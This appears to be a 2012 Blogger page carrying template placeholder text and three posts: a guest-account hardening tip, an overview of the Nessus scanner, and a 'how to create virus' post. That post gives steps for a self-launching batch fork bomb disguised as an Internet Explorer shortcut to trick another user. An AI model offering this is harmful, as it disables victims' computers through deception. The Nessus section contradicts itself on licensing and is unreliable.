This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Tuesday, 16 October 2012

How to create virus


Do you want to create virus within two minutes???
I show you the simple process of making a virus.This virus is not so much dangerous but it's funny .This is very simple and easy process of creating virus. You must follow these simple steps.

Step 1 : Open Notepad and write "start virus.bat" and save with name "virus.bat".


Step 2: Save this with name "virus.bat".


Step 3 : Copy this file and save in C drive.


Step 4 : Now create this shortcut on desktop and right click on shortcut and choose properties.


Step 5 : Click on change icon and choose icon of internet explorer or any of browser from there.

Step 6:  Now rename this with "Internet Explorer".


Step 7: Now your work is finish and virus is ready to work .
             Now if anyone click on this virus then he gone...








Secure your system from hackers


Hackers and viruses are the term which affects everyone at some stage. Our system have crucial information  of business or some  personal information which is the main target of hackers . So for securing our system we must have security alert . If we put these points in our mind then our system become more secure.

Method 1: Disable Guest Account.
                   Windows Xp have option of the Guest account.This guest account used for the providing service                     
                   and used for limited access ,but its used by hackers to damage system security. Disable it
                   completely if you are not using it

                  *Firstly open Control Panel and select User account.

           
                 * Now Click On Manage Account.


                *Now Click On Guest Account and turn off guest account.





Security Scanner Nessus


Nessus :

In computer security, Nessus is a proprietary comprehensive vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems .

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.  It does this by running over 1200 checks on a given computer, testing to see if any of these attacks could be used to break into the computer or otherwise harm it.



Why Nessus : 

According to surveys done by sectools.org, Nessus is the world's most popular vulnerability scanner, taking first place in the 2000, 2003, and 2006 security tools survey. Tenable estimates that it is used by over 75,000 organizations worldwide

Nessus Security Scanner was selected the winner in the Security Scanner Software category of the WindowSecurity.com Readers’ Choice Awards. GFI LANguard NSS and Retina Network Security Scanner Protection were first runner-up and second runner-up.

Open-source.  Nessus is open source, meaning it costs nothing, and you are free to see and modify the source    as you wish.

Patching Assistance:  When Nessus detects a vulnerability, it is also most often able to suggest the best way you can mitigate the vulnerability.

UP To Date Threat DataBase :The Nessus team updates the list of what vulnerabilities to check for on a daily basis in order to minimize the window between an exploit appearing in the wild, and you being able to detect it with Nessus.

Extensible :  Nessus is very extensible, providing a scripting language for you to write tests specific to your system once you become more familiar with the tool. Its also provides a plug-in interface, and many free plug-ins are available from the Nessus plug-in site.   These plugs are often specific to detecting a common virus or vulnerability. 

Nessus Working Mechanism :

To learn how Nessus and other port-scanning security tools work, it is necessary to understand different services (such as a web server, SMTP server, FTP server, etc) are accessed on a remote server.  Most high-level network traffic, such as email, web pages, etc reach a server via a high-level protocol that is transmitted reliably by a TCP stream.  To keep different streams from interfering with each other, a computer divides its physical connection to the network into thousands of logical paths, called ports.  So if you want to talk to a web server on a given machine, you would connect to port #80 (the standard HTTP port), but if you wanted to connect to an SMTP server on that same machine you would instead connect to port #25.   



Each computer has thousands of ports, all of which may or may not have services (ie: a server for a specific high-level protocol) listening on them.  Nessus works by testing each port on a computer, determining what service it is running, and then testing this service to make sure there are no vulnerabilities in it that could be used by a hacker to carry out a malicious attack.  Nessus is called a "remote scanner" because it does not need to be installed on a computer for it to test that computer.  Instead, you can install it on only one computer and test as many computers as you would like.


Related Links :